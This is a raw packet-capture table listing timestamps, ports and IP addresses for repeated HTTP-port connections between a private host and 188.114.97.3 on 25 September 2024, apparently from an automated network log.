              Sep 25, 2024 10:19:16.220455885 CEST4970780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:16.225141048 CEST8049707188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:16.364773035 CEST4970880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:16.369715929 CEST8049708188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:16.369849920 CEST4970880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:16.372112989 CEST4970880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:16.376938105 CEST8049708188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:16.376988888 CEST4970880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:16.381762028 CEST8049708188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:17.021929979 CEST8049708188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:17.022070885 CEST4970880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:17.022253036 CEST8049708188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:17.022301912 CEST4970880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:17.026937962 CEST8049708188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:17.165874958 CEST4970980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:17.170787096 CEST8049709188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:17.170865059 CEST4970980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:17.173356056 CEST4970980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:17.178589106 CEST8049709188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:17.178646088 CEST4970980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:17.183460951 CEST8049709188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:18.146569014 CEST8049709188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:18.146610022 CEST8049709188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:18.146656990 CEST4970980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:18.146656990 CEST4970980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:18.146662951 CEST8049709188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:18.146697044 CEST4970980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:18.146904945 CEST8049709188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:18.146948099 CEST4970980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:18.151618958 CEST8049709188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:18.284218073 CEST4971080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:18.289113998 CEST8049710188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:18.289211988 CEST4971080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:18.291294098 CEST4971080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:18.296037912 CEST8049710188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:18.296156883 CEST4971080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:18.300898075 CEST8049710188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:18.987284899 CEST8049710188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:18.987415075 CEST4971080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:18.987971067 CEST8049710188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:18.988023043 CEST4971080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:18.992491961 CEST8049710188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:19.142136097 CEST4971180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:19.147134066 CEST8049711188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:19.147241116 CEST4971180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:19.149311066 CEST4971180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:19.154211044 CEST8049711188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:19.154273987 CEST4971180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:19.159226894 CEST8049711188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:19.794781923 CEST8049711188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:19.794939995 CEST4971180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:19.795861006 CEST8049711188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:19.795917034 CEST4971180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:19.799881935 CEST8049711188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:20.096394062 CEST4971280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:20.102793932 CEST8049712188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:20.102880955 CEST4971280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:20.131067038 CEST4971280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:20.137371063 CEST8049712188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:20.137434959 CEST4971280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:20.142748117 CEST8049712188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:20.898915052 CEST8049712188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:20.899035931 CEST4971280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:20.899260998 CEST8049712188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:20.899394989 CEST4971280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:20.903836966 CEST8049712188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:21.040680885 CEST4971380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:21.045777082 CEST8049713188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:21.045932055 CEST4971380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:21.048491955 CEST4971380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:21.053350925 CEST8049713188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:21.053477049 CEST4971380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:21.058329105 CEST8049713188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:21.689222097 CEST8049713188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:21.689373970 CEST8049713188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:21.689404011 CEST4971380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:21.689440012 CEST4971380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:21.694245100 CEST8049713188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:21.830390930 CEST4971480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:21.835304022 CEST8049714188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:21.835381031 CEST4971480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:21.837608099 CEST4971480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:21.842592001 CEST8049714188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:21.842648029 CEST4971480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:21.847511053 CEST8049714188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:22.552182913 CEST8049714188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:22.552551031 CEST8049714188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:22.552650928 CEST4971480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:22.565459013 CEST4971480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:22.570359945 CEST8049714188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:22.833547115 CEST4971580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:22.838606119 CEST8049715188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:22.839068890 CEST4971580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:22.850320101 CEST4971580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:22.855140924 CEST8049715188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:22.855191946 CEST4971580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:22.859966993 CEST8049715188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:23.518683910 CEST8049715188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:23.518805981 CEST4971580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:23.518980980 CEST8049715188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:23.519057035 CEST4971580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:23.523582935 CEST8049715188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:23.664563894 CEST4971880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:23.669393063 CEST8049718188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:23.669683933 CEST4971880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:23.672030926 CEST4971880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:23.676841021 CEST8049718188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:23.676953077 CEST4971880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:23.681781054 CEST8049718188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:24.365703106 CEST8049718188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:24.365883112 CEST4971880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:24.366058111 CEST8049718188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:24.366107941 CEST4971880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:24.370930910 CEST8049718188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:24.556577921 CEST4972080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:24.561503887 CEST8049720188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:24.561580896 CEST4972080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:24.565601110 CEST4972080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:24.570615053 CEST8049720188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:24.570672035 CEST4972080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:24.575530052 CEST8049720188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:25.286429882 CEST8049720188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:25.286542892 CEST4972080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:25.287679911 CEST8049720188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:25.287727118 CEST4972080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:25.291419029 CEST8049720188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:25.427680016 CEST4972380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:25.432470083 CEST8049723188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:25.432543993 CEST4972380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:25.434835911 CEST4972380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:25.439635992 CEST8049723188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:25.439699888 CEST4972380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:25.750916958 CEST4972380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:25.772332907 CEST8049723188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:25.772342920 CEST8049723188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:27.092124939 CEST8049723188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:27.092250109 CEST4972380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:27.092381001 CEST8049723188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:27.092430115 CEST4972380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:27.096966028 CEST8049723188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:27.249926090 CEST4972480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:27.254779100 CEST8049724188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:27.254873991 CEST4972480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:27.264889956 CEST4972480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:27.269690990 CEST8049724188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:27.269752026 CEST4972480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:27.274604082 CEST8049724188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:28.045062065 CEST8049724188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:28.045170069 CEST8049724188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:28.045178890 CEST8049724188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:28.045248032 CEST4972480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:28.045300007 CEST4972480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:28.050244093 CEST8049724188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:28.194688082 CEST4972580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:28.199611902 CEST8049725188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:28.199721098 CEST4972580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:28.201822996 CEST4972580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:28.206696033 CEST8049725188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:28.206792116 CEST4972580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:28.211632013 CEST8049725188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:28.881432056 CEST8049725188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:28.881453037 CEST8049725188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:28.881607056 CEST4972580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:28.881707907 CEST4972580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:28.886614084 CEST8049725188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:29.024842024 CEST4972680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:29.029851913 CEST8049726188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:29.029992104 CEST4972680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:29.032421112 CEST4972680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:29.037648916 CEST8049726188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:29.037708998 CEST4972680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:29.042552948 CEST8049726188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:29.680705070 CEST8049726188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:29.680830002 CEST4972680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:29.680926085 CEST8049726188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:29.680974007 CEST4972680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:29.685693026 CEST8049726188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:29.834279060 CEST4972780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:29.839567900 CEST8049727188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:29.839720011 CEST4972780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:29.841895103 CEST4972780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:29.847790003 CEST8049727188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:29.847887993 CEST4972780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:29.854187965 CEST8049727188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:30.582844019 CEST8049727188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:30.583035946 CEST4972780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:30.583301067 CEST8049727188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:30.583350897 CEST4972780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:30.588201046 CEST8049727188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:30.721790075 CEST4972880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:30.726567030 CEST8049728188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:30.726639032 CEST4972880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:30.729020119 CEST4972880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:30.733782053 CEST8049728188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:30.733825922 CEST4972880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:30.738929033 CEST8049728188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:31.368978024 CEST8049728188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:31.369529963 CEST8049728188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:31.369595051 CEST4972880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:31.396070004 CEST4972880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:31.401029110 CEST8049728188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:31.676364899 CEST4972980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:31.825206995 CEST8049729188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:31.825351000 CEST4972980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:31.827506065 CEST4972980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:32.177676916 CEST8049729188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:32.177777052 CEST4972980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:32.182627916 CEST8049729188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:32.827177048 CEST8049729188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:32.827325106 CEST4972980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:32.827673912 CEST8049729188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:32.827721119 CEST4972980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:32.832107067 CEST8049729188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:32.977761030 CEST4973080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:32.982677937 CEST8049730188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:32.982810974 CEST4973080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:32.984972954 CEST4973080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:32.989762068 CEST8049730188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:32.989856958 CEST4973080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:32.994616985 CEST8049730188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:33.627873898 CEST8049730188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:33.628048897 CEST4973080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:33.628175020 CEST8049730188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:33.628223896 CEST4973080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:33.633464098 CEST8049730188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:33.788007975 CEST4973180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:33.792865992 CEST8049731188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:33.793019056 CEST4973180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:33.795108080 CEST4973180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:33.799936056 CEST8049731188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:33.800026894 CEST4973180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:33.807378054 CEST8049731188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:34.467776060 CEST8049731188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:34.467992067 CEST4973180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:34.468106031 CEST8049731188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:34.468153000 CEST4973180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:34.472796917 CEST8049731188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:34.616683006 CEST4973280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:34.622673988 CEST8049732188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:34.622786999 CEST4973280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:34.624982119 CEST4973280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:34.631084919 CEST8049732188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:34.631186962 CEST4973280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:34.635951996 CEST8049732188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:35.317949057 CEST8049732188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:35.318074942 CEST4973280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:35.318500042 CEST8049732188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:35.318546057 CEST4973280192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:35.322923899 CEST8049732188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:35.470660925 CEST4973380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:35.475594044 CEST8049733188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:35.475667000 CEST4973380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:35.477791071 CEST4973380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:35.482611895 CEST8049733188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:35.482686996 CEST4973380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:35.487493038 CEST8049733188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:36.366451025 CEST8049733188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:36.366610050 CEST4973380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:36.367718935 CEST8049733188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:36.367772102 CEST4973380192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:36.371521950 CEST8049733188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:36.525017977 CEST4973480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:36.530296087 CEST8049734188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:36.530464888 CEST4973480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:36.532704115 CEST4973480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:36.537594080 CEST8049734188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:36.537688017 CEST4973480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:36.542469978 CEST8049734188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:37.190291882 CEST8049734188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:37.190466881 CEST4973480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:37.191462994 CEST8049734188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:37.191515923 CEST4973480192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:37.195298910 CEST8049734188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:37.337724924 CEST4973580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:37.345993042 CEST8049735188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:37.346075058 CEST4973580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:37.348566055 CEST4973580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:37.356004953 CEST8049735188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:37.356070042 CEST4973580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:37.364672899 CEST8049735188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:38.140223980 CEST8049735188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:38.140429974 CEST4973580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:38.140805006 CEST8049735188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:38.140866995 CEST4973580192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:38.145205975 CEST8049735188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:38.287704945 CEST4973680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:39.232584000 CEST8049736188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:39.232650995 CEST4973680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:39.235093117 CEST4973680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:39.239820004 CEST8049736188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:39.239881039 CEST4973680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:39.244704962 CEST8049736188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:39.901659966 CEST8049736188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:39.901799917 CEST8049736188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:39.901885033 CEST4973680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:39.902307034 CEST4973680192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:39.906709909 CEST8049736188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:40.062381029 CEST4973780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:40.069998026 CEST8049737188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:40.070142031 CEST4973780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:40.072299957 CEST4973780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:40.078548908 CEST8049737188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:40.078686953 CEST4973780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:40.084846020 CEST8049737188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:40.752322912 CEST8049737188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:40.752516031 CEST4973780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:40.753087997 CEST8049737188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:40.753137112 CEST4973780192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:40.757426023 CEST8049737188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:40.897531986 CEST4973880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:40.903255939 CEST8049738188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:40.903460026 CEST4973880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:40.905690908 CEST4973880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:40.911381006 CEST8049738188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:40.911451101 CEST4973880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:40.917090893 CEST8049738188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:41.579946041 CEST8049738188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:41.580058098 CEST4973880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:41.580075026 CEST8049738188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:41.580118895 CEST4973880192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:41.586004972 CEST8049738188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:41.723059893 CEST4973980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:41.728354931 CEST8049739188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:41.728496075 CEST4973980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:41.730624914 CEST4973980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:41.735479116 CEST8049739188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:41.735559940 CEST4973980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:41.741059065 CEST8049739188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:42.413814068 CEST8049739188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:42.413834095 CEST8049739188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:42.413942099 CEST4973980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:42.413981915 CEST4973980192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:42.418948889 CEST8049739188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:42.558470011 CEST4974080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:42.563361883 CEST8049740188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:42.563489914 CEST4974080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:42.565653086 CEST4974080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:42.570638895 CEST8049740188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:42.570719957 CEST4974080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:42.575511932 CEST8049740188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:43.241015911 CEST8049740188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:43.241112947 CEST8049740188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:43.241127968 CEST4974080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:43.241158962 CEST4974080192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:43.246416092 CEST8049740188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:43.383935928 CEST4974180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:43.390463114 CEST8049741188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:43.390544891 CEST4974180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:43.392992973 CEST4974180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:43.399802923 CEST8049741188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:43.399884939 CEST4974180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:43.405540943 CEST8049741188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:44.027549982 CEST8049741188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:44.027787924 CEST4974180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:44.027820110 CEST8049741188.114.97.3192.168.2.7
              Sep 25, 2024 10:19:44.027915001 CEST4974180192.168.2.7188.114.97.3
              Sep 25, 2024 10:19:44.032597065 CEST8049741188.114.97.3192.168.2.7
